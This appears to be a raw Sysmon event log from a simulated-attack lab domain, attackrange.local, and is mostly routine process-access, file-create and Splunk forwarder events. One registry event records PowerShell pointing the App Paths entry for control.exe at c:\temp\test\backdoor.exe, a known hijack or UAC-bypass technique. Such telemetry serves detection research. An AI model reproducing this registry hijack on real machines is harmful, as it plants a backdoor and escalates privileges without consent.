10341000x80000000000000001051273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.211{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.190{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.190{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.190{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.175{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.158{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.143{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.143{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.143{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.128{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.128{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.111{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001051261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.111{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.111{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001051259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.043{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001051258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.012{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=A1920FFB99EBC00DBFD0FB3C2892097D,SHA256=6E4CC3AB44A361E4A311CB8C7203335C17F1816E641E41C33CD161799A2B3BE8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:46.004{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnk2021-07-12 07:48:31.902 23542300x80000000000000001051297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:47.361{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=09DBC3D6DF798F0B413319C617DDD35E,SHA256=096337D513E868AAC55E5500624C1F86663E084A92608152048F60A56E23AFB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:47.246{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5F317F83F7B4F0631706FEF31879C8A,SHA256=F87F48032AA0C96AB4EF054F4F3149EAA4EA7393989C602C94D10E07824DEEB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808579Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:47.102{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A0B31247925FFD364496BF59FC179E0,SHA256=1C4973C75D47E91A817FA4703B4D1C0F03926510F5AF7884E78C206177545F45,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:38.590{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51102-false10.0.1.12-8000- 13241300x80000000000000001051294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:57:47.114{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\test\backdoor.exe 23542300x80000000000000001051298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:48.261{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70AE7DF88BDC9BAEC32D4D6D5DB4D777,SHA256=9F9D3828DDD7ED7C5D24CC9B1CCF28D1FC363B9359C0C3E3182EE202245515C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808580Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:48.149{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=361D2A727F546D610D9682A80192D8D8,SHA256=85B9BE556C760DEAB1265E75B3DFBA499AAE8F2A5B8546320F7EDFA77771368A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.944{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\WimProvider.dllMD5=1B0C7DFB2240BA004B37904073624DB3,SHA256=F2C7DB522DDE968EDF49B03BC10978AAC4C42C745CA4A474627E8CEBBCEBB00A,IMPHASH=20D31D66F56B810094B1AA564C92009Dtruetrue 
23542300x80000000000000001051443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.928{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\VhdProvider.dllMD5=F37C8F5BF852151D9BF085687A8DEC6D,SHA256=6CDFC95C2F2ED3695D5EE8CF4367A6C7FB5707DA3C234CEE8FA8C1BBDE426DE7,IMPHASH=3CA997A1A0BD38B850B18DAED5E948DEtruetrue 23542300x80000000000000001051442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.928{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\UnattendProvider.dllMD5=3DB4777B76FC1973A61754FAEC348981,SHA256=29A4C7379E5A0A7532C90B5ACE0DD99AB5311D03CC0BA6A4BCFB410D7D8B01AE,IMPHASH=4FA75E8720452554D61C8AC5FD64C43Ftruetrue 23542300x80000000000000001051441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.928{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\TransmogProvider.dllMD5=5E82E2B7CFF045C7CDA8E33EAB186402,SHA256=0038B82E999C3DEF3980D39A8CAED9EA6B52A4FC9EF58BF3B3F5FC91F7748112,IMPHASH=7746C0E3C7D3763C5F13C90D4934087Btruetrue 23542300x80000000000000001051440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.912{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\SmiProvider.dllMD5=C5C7A9E3121B91E51ECFBA6FB2985044,SHA256=FB519B9EEF4C3344D58C768BD3AD7ADCB0677EA7B998056B6A13620CB9E61412,IMPHASH=03C38376DA7CCE75E82EECACADA0EA03truetrue 23542300x80000000000000001051439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.912{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\ProvProvider.dllMD5=5077063311C5708318C5FA3E255011ED,SHA256=97FA95102B6ACF00C70F140EE9FA4A73A6BE7C03E0F0D99AE58DB5E492CD0ECA,IMPHASH=D8DD764BFC0F1D9E403714D169018B83truetrue 23542300x80000000000000001051438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.912{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\OSProvider.dllMD5=4868187A2F176074DB7F35E356F74D4F,SHA256=84C8C4C67C808871A278254304D985533F67D44391840F43674FC829014E1B60,IMPHASH=82A4D833A82D441391A9AA3027199337truetrue 23542300x80000000000000001051437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.912{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\OfflineSetupProvider.dllMD5=86B7E8438B1125C479FD275B1BDDB9A7,SHA256=47FAF8671B25A30D7BCC47AD35926D70DB633A181FA6C276479B4408A526E63E,IMPHASH=B8B4A188EFC4F12D33591C6D319B6F12truetrue 23542300x80000000000000001051436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.908{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\MsiProvider.dllMD5=EA19239A85416A488360FA564D312402,SHA256=F21591336CD1A24EE941827620405FA34414C1C349216B4B8083ECD1FFF17C29,IMPHASH=33E1132923056DDEFB0521726DA5B987truetrue 23542300x80000000000000001051435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.891{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\LogProvider.dllMD5=F7DB4F104DBB56DF5A156E7329E80112,SHA256=7C67EFAF44D1413576B4575B1A4C975BCB10B64BEF13E6756E895D4DB9E61AA2,IMPHASH=FB695172E8A76C56E97CE435F8ED0220truetrue 23542300x80000000000000001051434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.891{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\IntlProvider.dllMD5=0082903881275179642AE83EFA720310,SHA256=7CCF1625E6FBE4DB16F12AC037E4236A3EF269DEE47A157C68374C867941F9E8,IMPHASH=CFB81BC5FF922F23D605A653700FE666truetrue 23542300x80000000000000001051433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.891{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\ImagingProvider.dllMD5=EEB4AA36BAD26A2C6216A1FF3439B58C,SHA256=44A6679425039DC870C297294C4B3323F6FA9DE5C7D16D7D0AB7E1254AFC75D3,IMPHASH=0264D9B4BFE54732ADF0E29BC73BF280truetrue 23542300x80000000000000001051432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.891{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\IBSProvider.dllMD5=11DE34FCDB75E79A920D3B491F3E7BF0,SHA256=6B7C7AD8B1AD522B27B2CC5E4F76F56ADE4495D7D46CE4F997A68954F072AF17,IMPHASH=C755896FA14213058E34639A28868FBCtruetrue 23542300x80000000000000001051431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\GenericProvider.dllMD5=397ED660129D40927A27B75A4B8FAE2E,SHA256=EAFCECFE911DABB4531E1331DDF2E119DCBB6B7A887D70BDE737EA76BE10EB74,IMPHASH=F55EE75573C110804DE5E50ACEEC1B06truetrue 23542300x80000000000000001051430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\FolderProvider.dllMD5=6428B4D0C26DB23E9478F039891CD5C9,SHA256=55126BB099785C2F9CD32A30991082C47D62C8231D570A9D8A6F3CC599B25EE1,IMPHASH=B2CC5EDD42A866F7CB6CAE42DB969187truetrue 23542300x80000000000000001051429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\FfuProvider.dllMD5=E27BC7F808E72F08372BA3C40B4B6344,SHA256=927B194432046C0D2ADF7C7B71E4BE85602C4D00A5D6EDA9F9DB9924E1C3447A,IMPHASH=8580AF5C1871319D05329DB2E96A8146truetrue 23542300x80000000000000001051428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\WimProvider.dll.muiMD5=CC3B15540DDB521A300BAFF0BF4F902E,SHA256=33C06CC037DF1EBB72A15BCC2E09BC89DFEF7DD94441C650FD3D0C833122002A,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\VhdProvider.dll.muiMD5=10536C56F02E68EBD13D0B2CE8665C6A,SHA256=06C3B71D251A8DD47D02EDBFBE84E0B6B1D67956DE4D3996031434CBAD728929,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\UnattendProvider.dll.muiMD5=B7E3676672BE6851EA13ADD879C2945E,SHA256=2D2D82EE842CD346B58DCAFAE6FEC46D491E0D15CFBE0D8964A4AB7F18C5AAB9,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\TransmogProvider.dll.muiMD5=D5D596B1102DA565C2ED1FAAC170E758,SHA256=B5DBB36E947FD64AAF22C53F0A9634C7D72D4CC270C055B67E020920BF806909,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\SmiProvider.dll.muiMD5=CAD746ED5AF63E7FC49ED4A5A3984629,SHA256=016C6071B04E6D7E12AD9B8A85C002320331E01ED62922C573A1AC43BA0DD919,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
